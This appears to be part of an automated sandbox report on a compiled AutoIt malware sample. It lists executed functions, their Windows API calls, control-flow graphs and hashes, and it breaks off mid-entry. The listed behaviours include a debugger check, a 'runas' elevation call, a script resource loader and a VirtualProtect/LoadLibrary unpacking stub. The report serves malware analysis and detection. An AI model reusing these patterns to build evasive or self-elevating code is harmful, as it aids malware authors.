107198->107041 107199->107041 107200->107050 107201->107061 107202->107049 107203->107022 107204->107050 107205->107031 107206->107057 107207->107057 107208->107057 107209->107044 107210->107045 107211->107044 107213 8055a2 107212->107213 107214 80557d 107212->107214 107215 807d8c 60 API calls 107213->107215 107214->107213 107218 80558c 107214->107218 107219 86325e 107215->107219 107216 86328d 107216->107101 107220 805ab8 60 API calls 107218->107220 107219->107216 107234 8631fa ReadFile SetFilePointerEx 107219->107234 107235 807924 60 API calls 2 library calls 107219->107235 107221 86337e 107220->107221 107223 8054d2 62 API calls 107221->107223 107224 86338c 107223->107224 107226 86339c Mailbox 107224->107226 107236 8077da 62 API calls Mailbox 107224->107236 107226->107101 107227->107078 107228->107105 107229->107106 107230->107076 107231->107076 107232->107099 107233->107104 107234->107219 107235->107219 107236->107226 107237->107156 107238->107118 107239->107138 107240->107138 107241->107176 107242->107176 107243->107165 107245 8560e8 107244->107245 107246 8560cb 107244->107246 107245->107197 107246->107245 107248 8560ab 60 API calls Mailbox 107246->107248 107248->107246

                                                      Executed Functions

                                                      Function 00803B3A Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153windowCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00803B68
                                                      • IsDebuggerPresent.KERNEL32 ref: 00803B7A
                                                      • GetFullPathNameW.KERNEL32(00007FFF,?,?,008C52F8,008C52E0,?,?), ref: 00803BEB
                                                        • Part of subcall function 00807BCC: _memmove.LIBCMT ref: 00807C06
                                                        • Part of subcall function 0081092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00803C14,008C52F8,?,?,?), ref: 0081096E
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00803C6F
                                                      • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,008B7770,00000010), ref: 0083D281
                                                      • SetCurrentDirectoryW.KERNEL32(?,008C52F8,?,?,?), ref: 0083D2B9
                                                      • GetForegroundWindow.USER32 ref: 0083D33F
                                                      • ShellExecuteW.SHELL32(00000000,?,?), ref: 0083D346
                                                        • Part of subcall function 00803A46: GetSysColorBrush.USER32(0000000F), ref: 00803A50
                                                        • Part of subcall function 00803A46: LoadCursorW.USER32(00000000,00007F00), ref: 00803A5F
                                                        • Part of subcall function 00803A46: LoadIconW.USER32(00000063), ref: 00803A76
                                                        • Part of subcall function 00803A46: LoadIconW.USER32(000000A4), ref: 00803A88
                                                        • Part of subcall function 00803A46: LoadIconW.USER32(000000A2), ref: 00803A9A
                                                        • Part of subcall function 00803A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00803AC0
                                                        • Part of subcall function 00803A46: RegisterClassExW.USER32(?), ref: 00803B16
                                                        • Part of subcall function 008039D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00803A03
                                                        • Part of subcall function 008039D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00803A24
                                                        • Part of subcall function 008039D5: ShowWindow.USER32(00000000), ref: 00803A38
                                                        • Part of subcall function 008039D5: ShowWindow.USER32(00000000), ref: 00803A41
                                                        • Part of subcall function 0080434A: _memset.LIBCMT ref: 00804370
                                                        • Part of subcall function 0080434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00804415
                                                      Strings
                                                      • This is a third-party compiled AutoIt script., xrefs: 0083D279
                                                      • runas, xrefs: 0083D33A
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                      • String ID: This is a third-party compiled AutoIt script.$runas
                                                      • API String ID: 529118366-3287110873
                                                      • Opcode ID: 881aeb4cb624599a38ac5a11ff0fc34f15cfe6d1864c405c9fad253070c973b2
                                                      • Instruction ID: 526d67c82e3ad8c2269c2bab4ea202bee51b4bfb3111791523cbb898509d9d0c
                                                      • Opcode Fuzzy Hash: 881aeb4cb624599a38ac5a11ff0fc34f15cfe6d1864c405c9fad253070c973b2
                                                      • Instruction Fuzzy Hash: 3A51E971D04248AEDF41EBB8EC05EED7BB9FF45744F004069F511E22E2DA746685CB22
                                                      Function 00803633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151timewindowregistryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 765 803633-803681 767 8036e1-8036e3 765->767 768 803683-803686 765->768 767->768 769 8036e5 767->769 770 8036e7 768->770 771 803688-80368f 768->771 772 8036ca-8036d2 NtdllDefWindowProc_W 769->772 773 8036ed-8036f0 770->773 774 83d0cc-83d0fa call 811070 call 811093 770->774 775 803695-80369a 771->775 776 80374b-803753 PostQuitMessage 771->776 777 8036d8-8036de 772->777 778 8036f2-8036f3 773->778 779 803715-80373c SetTimer RegisterClipboardFormatW 773->779 812 83d0ff-83d106 774->812 781 8036a0-8036a2 775->781 782 83d154-83d168 call 862527 775->782 783 803711-803713 776->783 784 8036f9-80370c KillTimer call 80443a call 803114 778->784 785 83d06f-83d072 778->785 779->783 787 80373e-803749 CreatePopupMenu 779->787 788 803755-803764 call 8044a0 781->788 789 8036a8-8036ad 781->789 782->783 807 83d16e 782->807 783->777 784->783 791 83d074-83d076 785->791 792 83d0a8-83d0c7 MoveWindow 785->792 787->783 788->783 795 8036b3-8036b8 789->795 796 83d139-83d140 789->796 800 83d097-83d0a3 SetFocus 791->800 801 83d078-83d07b 791->801 792->783 805 83d124-83d134 call 862d36 795->805 806 8036be-8036c4 795->806 796->772 803 83d146-83d14f call 857c36 796->803 800->783 801->806 808 83d081-83d092 call 811070 801->808 803->772 805->783 806->772 806->812 807->772 808->783 812->772 813 83d10c-83d11f call 80443a call 80434a 812->813 813->772
                                                      APIs
                                                      • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 008036D2
                                                      • KillTimer.USER32(?,00000001), ref: 008036FC
                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0080371F
                                                      • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 0080372A
                                                      • CreatePopupMenu.USER32 ref: 0080373E
                                                      • PostQuitMessage.USER32(00000000), ref: 0080374D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Timer$ClipboardCreateFormatKillMenuMessageNtdllPopupPostProc_QuitRegisterWindow
                                                      • String ID: TaskbarCreated
                                                      • API String ID: 157504867-2362178303
                                                      • Opcode ID: 4de6e7f00c72e4450c76551c6a101e2e2b06cda3022d2865c398587e96619072
                                                      • Instruction ID: fe3a5faf2a20ba4988e590dc7e2fa50805cad62103983cfbf500836ed913944e
                                                      • Opcode Fuzzy Hash: 4de6e7f00c72e4450c76551c6a101e2e2b06cda3022d2865c398587e96619072
                                                      • Instruction Fuzzy Hash: F44117B2100949ABDF546FACEC09F7A37ACFB55300F500135F702D62E2DB72A994A362
                                                      Function 008049A0 Relevance: 10.7, APIs: 7, Instructions: 223COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 940 8049a0-804a00 call 807667 GetVersionExW call 807bcc 945 804a06 940->945 946 804b0b-804b0d 940->946 947 804a09-804a0e 945->947 948 83d767-83d773 946->948 950 804b12-804b13 947->950 951 804a14 947->951 949 83d774-83d778 948->949 952 83d77b-83d787 949->952 953 83d77a 949->953 954 804a15-804a4c call 807d2c call 807726 950->954 951->954 952->949 955 83d789-83d78e 952->955 953->952 963 804a52-804a53 954->963 964 83d864-83d867 954->964 955->947 957 83d794-83d79b 955->957 957->948 959 83d79d 957->959 962 83d7a2-83d7a5 959->962 965 804a93-804aaa GetCurrentProcess IsWow64Process 962->965 966 83d7ab-83d7c9 962->966 963->962 967 804a59-804a64 963->967 968 83d880-83d884 964->968 969 83d869 964->969 970 804aac 965->970 971 804aaf-804ac0 965->971 966->965 972 83d7cf-83d7d5 966->972 973 83d7ea-83d7f0 967->973 974 804a6a-804a6c 967->974 976 83d886-83d88f 968->976 977 83d86f-83d878 968->977 975 83d86c 969->975 970->971 979 804ac2-804ad2 call 804b37 971->979 980 804b2b-804b35 GetSystemInfo 971->980 981 83d7d7-83d7da 972->981 982 83d7df-83d7e5 972->982 985 83d7f2-83d7f5 973->985 986 83d7fa-83d800 973->986 983 804a72-804a75 974->983 984 83d805-83d811 974->984 975->977 976->975 978 83d891-83d894 976->978 977->968 978->977 997 804ad4-804ae1 call 804b37 979->997 998 804b1f-804b29 GetSystemInfo 979->998 987 804af8-804b08 980->987 981->965 982->965 991 83d831-83d834 983->991 992 804a7b-804a8a 983->992 988 83d813-83d816 984->988 989 83d81b-83d821 984->989 985->965 986->965 988->965 989->965 991->965 994 83d83a-83d84f 991->994 995 804a90 992->995 996 83d826-83d82c 992->996 999 83d851-83d854 994->999 1000 83d859-83d85f 994->1000 995->965 996->965 1005 804ae3-804ae7 GetNativeSystemInfo 997->1005 1006 804b18-804b1d 997->1006 1001 804ae9-804aed 998->1001 999->965 1000->965 1001->987 1004 804aef-804af2 FreeLibrary 1001->1004 1004->987 1005->1001 1006->1005
                                                      APIs
                                                      • GetVersionExW.KERNEL32(?), ref: 008049CD
                                                        • Part of subcall function 00807BCC: _memmove.LIBCMT ref: 00807C06
                                                      • GetCurrentProcess.KERNEL32(?,0088FAEC,00000000,00000000,?), ref: 00804A9A
                                                      • IsWow64Process.KERNEL32(00000000), ref: 00804AA1
                                                      • GetNativeSystemInfo.KERNEL32(00000000), ref: 00804AE7
                                                      • FreeLibrary.KERNEL32(00000000), ref: 00804AF2
                                                      • GetSystemInfo.KERNEL32(00000000), ref: 00804B23
                                                      • GetSystemInfo.KERNEL32(00000000), ref: 00804B2F
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                      • String ID:
                                                      • API String ID: 1986165174-0
                                                      • Opcode ID: 2b13eedc42427100a2651d4111b78dba1e6a18e394a36ae45027ea82ce800c6b
                                                      • Instruction ID: b10d205ea033adba83fc8e67b2355fd11bf677c403082a6a9acb533dc0928d41
                                                      • Opcode Fuzzy Hash: 2b13eedc42427100a2651d4111b78dba1e6a18e394a36ae45027ea82ce800c6b
                                                      • Instruction Fuzzy Hash: F991C47198A7C4DECB71DB6898501AABFE5FF29300F444D6DD1C7D3A42D224B908C759
                                                      Function 00804E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1037 804e89-804ea1 CreateStreamOnHGlobal 1038 804ec1-804ec6 1037->1038 1039 804ea3-804eba FindResourceExW 1037->1039 1040 83d933-83d942 LoadResource 1039->1040 1041 804ec0 1039->1041 1040->1041 1042 83d948-83d956 SizeofResource 1040->1042 1041->1038 1042->1041 1043 83d95c-83d967 LockResource 1042->1043 1043->1041 1044 83d96d-83d98b 1043->1044 1044->1041
                                                      APIs
                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00804E99
                                                      • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00804D8E,?,?,00000000,00000000), ref: 00804EB0
                                                      • LoadResource.KERNEL32(?,00000000,?,?,00804D8E,?,?,00000000,00000000,?,?,?,?,?,?,00804E2F), ref: 0083D937
                                                      • SizeofResource.KERNEL32(?,00000000,?,?,00804D8E,?,?,00000000,00000000,?,?,?,?,?,?,00804E2F), ref: 0083D94C
                                                      • LockResource.KERNEL32(00804D8E,?,?,00804D8E,?,?,00000000,00000000,?,?,?,?,?,?,00804E2F,00000000), ref: 0083D95F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                      • String ID: SCRIPT
                                                      • API String ID: 3051347437-3967369404
                                                      • Opcode ID: 55de499dc475b4460106081f6c5b39ae1c04153166979507db2a08a04a60d21c
                                                      • Instruction ID: 860dac924a498c71447fd27fa3966ea32e2ffa7db209795f2ff958c85ec12be7
                                                      • Opcode Fuzzy Hash: 55de499dc475b4460106081f6c5b39ae1c04153166979507db2a08a04a60d21c
                                                      • Instruction Fuzzy Hash: 3E115EB5240701BFD7218B69EC48F677BBAFBC5B21F204268F605C62A0DB61E8018660
                                                      Function 0094DA30 Relevance: 7.7, APIs: 5, Instructions: 206librarymemoryloaderCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1083 94da30-94da3d 1084 94da4a-94da4f 1083->1084 1085 94da51 1084->1085 1086 94da40-94da45 1085->1086 1087 94da53 1085->1087 1088 94da46-94da48 1086->1088 1089 94da58-94da5a 1087->1089 1088->1084 1088->1085 1090 94da63-94da67 1089->1090 1091 94da5c-94da61 1089->1091 1092 94da74-94da77 1090->1092 1093 94da69 1090->1093 1091->1090 1096 94da80-94da82 1092->1096 1097 94da79-94da7e 1092->1097 1094 94da93-94da98 1093->1094 1095 94da6b-94da72 1093->1095 1098 94da9a-94daa3 1094->1098 1099 94daab-94daad 1094->1099 1095->1092 1095->1094 1096->1089 1097->1096 1100 94daa5-94daa9 1098->1100 1101 94db1a-94db1d 1098->1101 1102 94dab6 1099->1102 1103 94daaf-94dab4 1099->1103 1100->1102 1104 94db22-94db25 1101->1104 1105 94da84-94da86 1102->1105 1106 94dab8-94dabb 1102->1106 1103->1102 1109 94db27-94db29 1104->1109 1107 94da8f-94da91 1105->1107 1108 94da88-94da8d 1105->1108 1110 94dac4 1106->1110 1111 94dabd-94dac2 1106->1111 1113 94dae5-94daf4 1107->1113 1108->1107 1109->1104 1114 94db2b-94db2e 1109->1114 1110->1105 1112 94dac6-94dac8 1110->1112 1111->1110 1115 94dad1-94dad5 1112->1115 1116 94daca-94dacf 1112->1116 1117 94db04-94db11 1113->1117 1118 94daf6-94dafd 1113->1118 1114->1104 1119 94db30-94db4c 1114->1119 1115->1112 1121 94dad7 1115->1121 1116->1115 1117->1117 1123 94db13-94db15 1117->1123 1118->1118 1122 94daff 1118->1122 1119->1109 1120 94db4e 1119->1120 1124 94db54-94db58 1120->1124 1125 94dae2 1121->1125 1126 94dad9-94dae0 1121->1126 1122->1088 1123->1088 1127 94db9f-94dba2 1124->1127 1128 94db5a-94db70 LoadLibraryA 1124->1128 1125->1113 1126->1112 1126->1125 1130 94dba5-94dbac 1127->1130 1129 94db71-94db76 1128->1129 1129->1124 1131 94db78-94db7a 1129->1131 1132 94dbd0-94dc00 VirtualProtect * 2 1130->1132 1133 94dbae-94dbb0 1130->1133 1134 94db83-94db90 GetProcAddress 1131->1134 1135 94db7c-94db82 1131->1135 1138 94dc04-94dc08 1132->1138 1136 94dbb2-94dbc1 1133->1136 1137 94dbc3-94dbce 1133->1137 1140 94db92-94db97 1134->1140 1141 94db99 ExitProcess 1134->1141 1135->1134 1136->1130 1137->1136 1138->1138 1139 94dc0a 1138->1139 1140->1129
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(?), ref: 0094DB6A
                                                      • GetProcAddress.KERNEL32(?,00946FF9), ref: 0094DB88
                                                      • ExitProcess.KERNEL32(?,00946FF9), ref: 0094DB99
                                                      • VirtualProtect.KERNEL32(00800000,00001000,00000004,?,00000000), ref: 0094DBE7
                                                      • VirtualProtect.KERNEL32(00800000,00001000), ref: 0094DBFC
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
                                                      • String ID:
                                                      • API String ID: 1996367037-0
                                                      • Opcode ID: b7436e995b9c8e70598f0946611144cc021adbcca9762d7223e04ecd707ac2a8
                                                      • Instruction ID: c347d9334227ba5d02d404f107ade2795f54e71dea88e751bc0f8ca9c3946a1a
                                                      • Opcode Fuzzy Hash: b7436e995b9c8e70598f0946611144cc021adbcca9762d7223e04ecd707ac2a8
                                                      • Instruction Fuzzy Hash: 36513C76A4A3525BD7218EB8DCC0EB07798EB5233471D0B78C5E1C73C6E7A45806C760
                                                      Function 0086445A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetFileAttributesW.KERNEL32(?,0083E398), ref: 0086446A
                                                      • FindFirstFileW.KERNEL32(?,?), ref: 0086447B
                                                      • FindClose.KERNEL32(00000000), ref: 0086448B
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: FileFind$AttributesCloseFirst
                                                      • String ID:
                                                      • API String ID: 48322524-0
                                                      • Opcode ID: c89d28e72d2b7a102e98dd6596aaf13cf82baea3eb4bb633f0acb8a2435857f0
                                                      • Instruction ID: e4ca996805886ad67bdd514928558976a7c6456fe2c7763fb1fbb7b1512c703e
                                                      • Opcode Fuzzy Hash: c89d28e72d2b7a102e98dd6596aaf13cf82baea3eb4bb633f0acb8a2435857f0
                                                      • Instruction Fuzzy Hash: C6E0D8324115046B42106B3CEC0E4ED775CFE45335F100715F935D11D0EB7499009799
                                                      Function 008109D0 Relevance: 57.3, APIs: 27, Strings: 5, Instructions: 1300windowsleeptimeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00810A5B
                                                      • timeGetTime.WINMM ref: 00810D16
                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00810E53
                                                      • Sleep.KERNEL32(0000000A), ref: 00810E61
                                                      • LockWindowUpdate.USER32(00000000), ref: 00810EFA
                                                      • DestroyWindow.USER32 ref: 00810F06
                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00810F20
                                                      • Sleep.KERNEL32(0000000A,?,?), ref: 00844E83
                                                      • TranslateMessage.USER32(?), ref: 00845C60
                                                      • DispatchMessageW.USER32(?), ref: 00845C6E
                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00845C82
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                      • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                      • API String ID: 4212290369-3242690629
                                                      • Opcode ID: 47b7c3eb184a23fcb7a195a038fa7ea599b286982822a093bc7bea6a894c08f9
                                                      • Instruction ID: 53ff1a6e13dbc9cde6d57b4c288014216483280048ef92f8c3827699a7696c07
                                                      • Opcode Fuzzy Hash: 47b7c3eb184a23fcb7a195a038fa7ea599b286982822a093bc7bea6a894c08f9
                                                      • Instruction Fuzzy Hash: 92B27C70608745DFD724DB28C885BAEB7E5FF84304F14491DE59AD72A2DBB1E884CB82
                                                      Function 00869155 Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 00868F5F: __time64.LIBCMT ref: 00868F69
                                                        • Part of subcall function 00804EE5: _fseek.LIBCMT ref: 00804EFD
                                                      • __wsplitpath.LIBCMT ref: 00869234
                                                        • Part of subcall function 008240FB: __wsplitpath_helper.LIBCMT ref: 0082413B
                                                      • _wcscpy.LIBCMT ref: 00869247
                                                      • _wcscat.LIBCMT ref: 0086925A
                                                      • __wsplitpath.LIBCMT ref: 0086927F
                                                      • _wcscat.LIBCMT ref: 00869295
                                                      • _wcscat.LIBCMT ref: 008692A8
                                                        • Part of subcall function 00868FA5: _memmove.LIBCMT ref: 00868FDE
                                                        • Part of subcall function 00868FA5: _memmove.LIBCMT ref: 00868FED
                                                      • _wcscmp.LIBCMT ref: 008691EF
                                                        • Part of subcall function 00869734: _wcscmp.LIBCMT ref: 00869824
                                                        • Part of subcall function 00869734: _wcscmp.LIBCMT ref: 00869837
                                                      • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00869452
                                                      • _wcsncpy.LIBCMT ref: 008694C5
                                                      • DeleteFileW.KERNEL32(?,?), ref: 008694FB
                                                      • CopyFileW.KERNEL32(?,?,00000000), ref: 00869511
                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00869522
                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00869534
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
